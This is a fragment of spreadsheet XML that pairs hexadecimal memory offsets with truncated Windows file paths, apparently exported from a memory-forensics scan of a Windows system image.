    <t>\Windows\winsxs\FileMaps\$$_en-us_40104e69a1d105cc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6aa530</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_mediarenderer_923295b945ee30c7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6aa7c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_smsvchost_3.0.0.0_0000_2d6d90735cb61780.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6aab88</t>
  </si>
  <si>
    <t>0xde6aaf18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\MsCtfMonitor.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6abe48</t>
  </si>
  <si>
    <t>0xde6ac148</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_tapisrv_0409_2e999d941b862689.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ac2e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\NetworkItemFactory.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ac538</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\angelusb.inf_x86_neutral_7bfd84ec2b59623e\AngelUs</t>
  </si>
  <si>
    <t>0xde6ac6b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\accessibilitycpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ac9a0</t>
  </si>
  <si>
    <t>idge.Dtc.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ace18</t>
  </si>
  <si>
    <t>0xde6ad038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_networking_en-us_9db86426234993c3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ad588</t>
  </si>
  <si>
    <t>0xde6ad640</t>
  </si>
  <si>
    <t>n.v4.0.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6adad0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnttme.inf_x86_neutral_78a105adf91770cf\mdmnttm</t>
  </si>
  <si>
    <t>0xde6adb88</t>
  </si>
  <si>
    <t>0xde6aea18</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\fd564d1265788d42424b8a09e213</t>
  </si>
  <si>
    <t>f7ab\System.D</t>
  </si>
  <si>
    <t>ata.Service</t>
  </si>
  <si>
    <t>s.ni.d</t>
  </si>
  <si>
    <t>0xde6aead0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_sorting_04883de290c6ef1b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6af2e8</t>
  </si>
  <si>
    <t>0xde6af3a0</t>
  </si>
  <si>
    <t>0xde6af520</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{E0F8DDD1-917C-47EA-B9D</t>
  </si>
  <si>
    <t>7-745A2E4584D</t>
  </si>
  <si>
    <t>E}_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6afdf0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\qasf.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b0250</t>
  </si>
  <si>
    <t>patibility.Data.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b0660</t>
  </si>
  <si>
    <t>computer.lnk_x001B_</t>
  </si>
  <si>
    <t>0xde6b0718</t>
  </si>
  <si>
    <t>idge.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b0e50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Entity\v4.0_4.0.0.0__b77a5c561934e089\Syst</t>
  </si>
  <si>
    <t>em.Web.Entity</t>
  </si>
  <si>
    <t>0xde6b14e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_servicemodelendpoint_3.0.0.0_0409_1441b5536e0ddf54.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b1998</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmlasno.inf_x86_neutral_34eb90af717f869f\mdmlasn</t>
  </si>
  <si>
    <t>0xde6b1d88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ntmarta.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b2180</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\appmgmts.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b23f8</t>
  </si>
  <si>
    <t>.dll.a</t>
  </si>
  <si>
    <t>0xde6b2590</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_data_provider_for_oracle_07838adde9419766.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b2648</t>
  </si>
  <si>
    <t>patibility.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b2e18</t>
  </si>
  <si>
    <t>ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b3108</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\racengn.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b3288</t>
  </si>
  <si>
    <t>0xde6b34a0</t>
  </si>
  <si>
    <t>.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b3740</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b37f8</t>
  </si>
  <si>
    <t>0xde6b3c28</t>
  </si>
  <si>
    <t>0xde6b3ce0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.VisualBasic.Activities.Compiler\v4.0_10.0.0.0</t>
  </si>
  <si>
    <t>__b03f5f7f11d</t>
  </si>
  <si>
    <t>50a3a\Micro</t>
  </si>
  <si>
    <t>soft.V</t>
  </si>
  <si>
    <t>isualBasic.Activities.Compiler.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b3f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\SCardSvr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b4130</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_prefetch_1688e4e8b2f89473.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b45a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Mystify.scr.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b4820</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wpd_ci.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b4ac8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WPDSp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b4ce0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmsys.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b5038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_40103e2da1d121de.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b53d0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\fc775bc85f804687d83123ed127a</t>
  </si>
  <si>
    <t>cd0e\UIAutoma</t>
  </si>
  <si>
    <t>tionClients</t>
  </si>
  <si>
    <t>idePro</t>
  </si>
  <si>
    <t>viders.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b5610</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wcncsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b5b68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_cs-cz_3ecfefb68a8fc3f6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b5d80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\705ed017a602c7a31bd043a8cb70</t>
  </si>
  <si>
    <t>a9e6\Presenta</t>
  </si>
  <si>
    <t>rk.Aer</t>
  </si>
  <si>
    <t>oLite.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b6200</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\notepad.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b63b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtdkj4.inf_x86_neutral_8df3f305ccbf60a5\mdmtdkj</t>
  </si>
  <si>
    <t>0xde6b65c8</t>
  </si>
  <si>
    <t>0xde6b6880</t>
  </si>
  <si>
    <t>\Windows\System32\mmres.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b6c98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\nci.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b6f18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cryptui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b7038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561</t>
  </si>
  <si>
    <t>934e089\Syste</t>
  </si>
  <si>
    <t>m.Data.Data</t>
  </si>
  <si>
    <t>SetExt</t>
  </si>
  <si>
    <t>ensions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b7d50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\61883.inf_x86_neutral_f2be571a17fa203a\61883.inf_x001B_</t>
  </si>
  <si>
    <t>0xde6b8390</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmolic.inf_x86_neutral_f186913a5367cd56\mdmolic.</t>
  </si>
  <si>
    <t>0xde6b8968</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{1E521162-F9BE-487A-B66</t>
  </si>
  <si>
    <t>C-1DBE0E8C286</t>
  </si>
  <si>
    <t>2}_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b8bc8</t>
  </si>
  <si>
    <t>0xde6b8d48</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\iologmsg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b8eb0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netevent.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b91d8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Device\f9e5cadd51b6299b7e6391c8f85774f3\Sy</t>
  </si>
  <si>
    <t>stem.Device.n</t>
  </si>
  <si>
    <t>0xde6b9310</t>
  </si>
  <si>
    <t>0xde6b97d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_els_spelldictionaries_f8bab08f83431341.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b9888</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_els_hyphenationdictionaries_62199cb34951fc74.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde6b9b68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ntlanman.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6b9f80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{8069EFFA-819F-47F8-B8C</t>
  </si>
  <si>
    <t>E-87957021CB3</t>
  </si>
  <si>
    <t>C}_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ba0e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sxs.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ba488</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmke.inf_x86_neutral_2ab6764455927942\mdmke.inf_x001B_</t>
  </si>
  <si>
    <t>0xde6ba540</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\abe889037827656c2d5b003162e2</t>
  </si>
  <si>
    <t>fab0\System.D</t>
  </si>
  <si>
    <t>s.Desi</t>
  </si>
  <si>
    <t>gn.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ba678</t>
  </si>
  <si>
    <t>.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bb0d0</t>
  </si>
  <si>
    <t>0xde6bb188</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn.Contract\v4.0_4.0.0.0__b03f5f7f11d50a3a\</t>
  </si>
  <si>
    <t>System.AddIn.</t>
  </si>
  <si>
    <t>Contract.dl</t>
  </si>
  <si>
    <t>0xde6bb3f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_styles_pal_55d264f56641a00e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bb668</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\d3fa8a345281ba8ccf83a674e3eb371</t>
  </si>
  <si>
    <t>3\System.Web.</t>
  </si>
  <si>
    <t>Mobile.ni.d</t>
  </si>
  <si>
    <t>0xde6bb720</t>
  </si>
  <si>
    <t>0xde6bb7d8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Design\v4.0_4.0.0.0__b77a5c56193</t>
  </si>
  <si>
    <t>4e089\System.</t>
  </si>
  <si>
    <t>Data.Servic</t>
  </si>
  <si>
    <t>es.Des</t>
  </si>
  <si>
    <t>0xde6bba60</t>
  </si>
  <si>
    <t>tp.ni.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde6bbbd8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\c404cce63455d0cd4b187285a4fb</t>
  </si>
  <si>
    <t>52c1\System.D</t>
  </si>
  <si>
    <t>s.Clie</t>
  </si>
  <si>
    <t>nt.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bbf80</t>
  </si>
  <si>
    <t>position.Registration.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bc038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\1736bb0e9a7b837aee91163b900628</t>
  </si>
  <si>
    <t>90\UIAutomati</t>
  </si>
  <si>
    <t>onClient.ni</t>
  </si>
  <si>
    <t>0xde6bc268</t>
  </si>
  <si>
    <t>0xde6bc310</t>
  </si>
  <si>
    <t>0xde6bc698</t>
  </si>
  <si>
    <t>0xde6bca78</t>
  </si>
  <si>
    <t>0xde6bcbe0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Channels\v4.0_4.0.0.0__31bf3856ad</t>
  </si>
  <si>
    <t>.ServiceMod</t>
  </si>
  <si>
    <t>el.Cha</t>
  </si>
  <si>
    <t>nnels.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bcf80</t>
  </si>
  <si>
    <t>\Windows\System32\WPDShServiceObj.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bd038</t>
  </si>
  <si>
    <t>\Windows\System32\gameux.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bd168</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rundll32.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bd288</t>
  </si>
  <si>
    <t>Instancing.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bd740</t>
  </si>
  <si>
    <t>oLite.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bd878</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Web\v4.0_4.0.0.0__31bf3856ad364e3</t>
  </si>
  <si>
    <t>5\System.Serv</t>
  </si>
  <si>
    <t>iceModel.We</t>
  </si>
  <si>
    <t>b.dll_x001B_</t>
  </si>
  <si>
    <t>0xde6bdd00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.DurableInstancing\v4.0_4.0.0.0__31b</t>
  </si>
  <si>
    <t>\System.Act</t>
  </si>
  <si>
    <t>s.DurableInstancing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6be1a0</t>
  </si>
  <si>
    <t>0xde6be2a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\urlmon.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6be3c0</t>
  </si>
  <si>
    <t>ities.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6be478</t>
  </si>
  <si>
    <t>t.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6be5b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_compattel_387f970722416aa9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bea60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hpoa1ss.inf_x86_neutral_b8a0ac47cc2c2b5d\hpoa1ss.</t>
  </si>
  <si>
    <t>0xde6beb18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dwmapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bed78</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\FunDisc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bf598</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\b8e175ccaf5b3c2cfe68a1501560917e\Sys</t>
  </si>
  <si>
    <t>tem.AddIn.ni.</t>
  </si>
  <si>
    <t>0xde6bf650</t>
  </si>
  <si>
    <t>0xde6bf978</t>
  </si>
  <si>
    <t>\Windows\System32\PortableDeviceTypes.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bfa30</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\fcb620f85cfada82231f8332cd8c</t>
  </si>
  <si>
    <t>e93c\System.W</t>
  </si>
  <si>
    <t>indows.Pres</t>
  </si>
  <si>
    <t>entati</t>
  </si>
  <si>
    <t>on.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bfb58</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\449F70579F91AD43B99D3A43AC</t>
  </si>
  <si>
    <t>0D1C25_9E9986</t>
  </si>
  <si>
    <t>170876CF017</t>
  </si>
  <si>
    <t>C698FF</t>
  </si>
  <si>
    <t>3F506502C_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bfe10</t>
  </si>
  <si>
    <t>0xde6bfec8</t>
  </si>
  <si>
    <t>on.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6bff80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Presentation\v4.0_4.0.0.0__b77a5c56193</t>
  </si>
  <si>
    <t>Windows.Pre</t>
  </si>
  <si>
    <t>sentat</t>
  </si>
  <si>
    <t>ion.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c0168</t>
  </si>
  <si>
    <t>\Windows\System32\srhelper.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c0220</t>
  </si>
  <si>
    <t>ion.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c02d8</t>
  </si>
  <si>
    <t>0xde6c04f8</t>
  </si>
  <si>
    <t>ign.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c0718</t>
  </si>
  <si>
    <t>m.Net.ni.dll.</t>
  </si>
  <si>
    <t>aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c0a40</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\ff20c02557f66400a7c505a3eca7</t>
  </si>
  <si>
    <t>15fb\WindowsF</t>
  </si>
  <si>
    <t>ormsIntegra</t>
  </si>
  <si>
    <t>tion.n</t>
  </si>
  <si>
    <t>i.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c0af8</t>
  </si>
  <si>
    <t>0xde6c0c88</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.Ad</t>
  </si>
  <si>
    <t>dIn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c1038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.</t>
  </si>
  <si>
    <t>0xde6c1180</t>
  </si>
  <si>
    <t>sign.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c1448</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_digitallocker_en-us_ff53d45933582902.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c1568</t>
  </si>
  <si>
    <t>0xde6c17c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dnsapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c1940</t>
  </si>
  <si>
    <t>0xde6c1a40</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmcss.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c1b60</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DynamicData\v4.0_4.0.0.0__31bf3856ad364e35</t>
  </si>
  <si>
    <t>\System.Web.D</t>
  </si>
  <si>
    <t>ynamicData.</t>
  </si>
  <si>
    <t>0xde6c1eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-za_theme_87a14dce71263ecc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c2038</t>
  </si>
  <si>
    <t>0xde6c2660</t>
  </si>
  <si>
    <t>ions.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c2918</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mshtmler.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c2b30</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\photowiz.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c2e48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\81d0dd1158a37e22d73fe1878fd4</t>
  </si>
  <si>
    <t>2b07\System.D</t>
  </si>
  <si>
    <t>ata.Entity.</t>
  </si>
  <si>
    <t>Design</t>
  </si>
  <si>
    <t>0xde6c3028</t>
  </si>
  <si>
    <t>0xde6c37f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wudfsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c3ad0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ql40xx2.inf_x86_neutral_b95932400326817e\ql40xx2.</t>
  </si>
  <si>
    <t>0xde6c3d18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\webclnt.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c3e38</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\3f1c75d31e4efa22488bb3712094</t>
  </si>
  <si>
    <t>802b\System.S</t>
  </si>
  <si>
    <t>.Routi</t>
  </si>
  <si>
    <t>ng.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c3f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_fi-fi_da1fe77a29be0007.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c42b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_styles_ntsc_symphony_symphony_97a43ae95f09b239.cd</t>
  </si>
  <si>
    <t>f-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c4720</t>
  </si>
  <si>
    <t>0xde6c47d8</t>
  </si>
  <si>
    <t>0xde6c4940</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wlanpref.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c49f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a9ed2a05e77c92a2d121672faf3</t>
  </si>
  <si>
    <t>5a12\System.W</t>
  </si>
  <si>
    <t>ata.ni</t>
  </si>
  <si>
    <t>0xde6c4bf0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\azroles.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c52e8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c56193</t>
  </si>
  <si>
    <t>es.Cli</t>
  </si>
  <si>
    <t>ent.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c5700</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_windows_workflow_foundation_3.0.0.0_0409_c87be95da75f6cc6.cdf-</t>
  </si>
  <si>
    <t>0xde6c5b38</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Http.WebRequest\v4.0_4.0.0.0__b03f5f7f11d5</t>
  </si>
  <si>
    <t>0a3a\System.N</t>
  </si>
  <si>
    <t>0xde6c5d90</t>
  </si>
  <si>
    <t>0xde6c5e48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\c4605295e45e7b475f09e2ffbfaa</t>
  </si>
  <si>
    <t>1eb9\System.S</t>
  </si>
  <si>
    <t>.Web.n</t>
  </si>
  <si>
    <t>0xde6c5f80</t>
  </si>
  <si>
    <t>\Windows\Resources\Themes\Aero\Shell\NormalColor\shellstyle.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c63a8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_de-de_40b6416a87b647ef.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c6510</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\cxfalcon_ibv32.inf_x86_neutral_01ff517b4c863eb6\c</t>
  </si>
  <si>
    <t>xfalcon_IBV32</t>
  </si>
  <si>
    <t>.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c67c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\MMDevAPI.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c69a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00g.inf_x86_neutral_b19defbd7969a7c7\prnca00</t>
  </si>
  <si>
    <t>0xde6c7038</t>
  </si>
  <si>
    <t>nt.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c7200</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\i8042prt.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c7478</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\462d856e702594c889c0f6cdf179</t>
  </si>
  <si>
    <t>ac1a\System.D</t>
  </si>
  <si>
    <t>irectorySer</t>
  </si>
  <si>
    <t>vices.</t>
  </si>
  <si>
    <t>AccountManagement.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c7700</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wucltux.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c7a10</t>
  </si>
  <si>
    <t>0xde6c7d58</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imekr8_help_6edfa6f9f9cba42e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c8038</t>
  </si>
  <si>
    <t>0xde6c82c0</t>
  </si>
  <si>
    <t>0xde6c84a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mlang.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c8788</t>
  </si>
  <si>
    <t>entation.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c8968</t>
  </si>
  <si>
    <t>0xde6c8c38</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\usbstor.inf_x86_neutral_de27b3e85e2c60fc\usbstor.</t>
  </si>
  <si>
    <t>0xde6c8f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dot3svc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6c9710</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\94ccfff1d0a2c0ab57ffa6287303fdd</t>
  </si>
  <si>
    <t>2\System.Web.</t>
  </si>
  <si>
    <t>Entity.ni.d</t>
  </si>
  <si>
    <t>0xde6c9900</t>
  </si>
  <si>
